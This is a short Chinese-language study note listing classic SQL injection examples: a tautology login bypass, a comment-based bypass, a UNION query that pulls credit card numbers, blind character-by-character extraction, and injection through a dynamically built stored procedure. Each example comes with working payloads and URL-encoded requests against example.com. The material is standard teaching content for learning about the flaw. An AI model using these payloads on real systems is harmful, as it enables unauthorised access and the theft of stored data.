[笔记]SQL注入常用语句
example1:
select * from users where username=’$username’ and password=’$password’ test data: $username = 1′ or ‘1’=’1 $password=1′ or ‘1’=’1 select * from users where username=’1′ or ‘1’=’1′ and password=’1′ or ‘1’=’1′
如果参数值是GET方法传递到服务器,则访问请求是:
http://www.example.com/index.php?username=1’%20or%20’1’%20=%20’1&password=1’%20or%20’1’%20=%20’1
sql语句永远为真,未验证用户名和密码;
example 2:
select * from users where((username=’$username’)and(password=md5(‘$password’))) test data: $username=1′ or ‘1’=’1′))/* $password = foo select * from users where ((username=’1′ or ‘1’=’1′))/*’)and(password=md5(‘$password’))) url 请求: http://www.example.com/index.php?username=1’%20or%20’1’%20=%20’1′))/*&password=foo
example 3:
select name,phone,address from users where id=$id test data: $id=1 union all select creditcardnumber,1,1 from creditcartable select name,phone,address from users where id=1 union all select creaditcardnumber,1,1 from creditcartable
example 4:
盲目sql注入,如url中有参数名为id,则输入url请求引用:
http://www.exampe.com/index.php?id=1′
假设服务器查询语句为:
select field1,field2,field3 from users where id=’$id’
逐字符读取值的函数:
substring(text,start,length),ascii(char),length(text)
将id引用为:
$id=1′ and ascii(substring(username,1,1))=97 and ‘1’=’1 select field1,field2,field3 from users where id=’1′ and ascii(substring(username,1,1))=97 and ‘1’=’1
如果数据库用户名第一个字符ascii码为97,能得到真值,继续寻找用户名下一个字符,如果没有,猜测98,反复判断合法用户名;
example 5:
存储过程注入
如果在使用存储过程不当的时候,会造成一定的SQL注入漏洞。
Create procedure user_login @username varchar(20),@password varchar(20) As Declare @sqlstring varchar(250) Set @sqlstring =” Select 1 from users where username=’+@username+’and password=’+@password exec(@sqlstring) Go test data: anyusername or 1=1′ anypassword
如果程序没有对输入进行验证,那么上面的语句就返回数据库中的一条记录。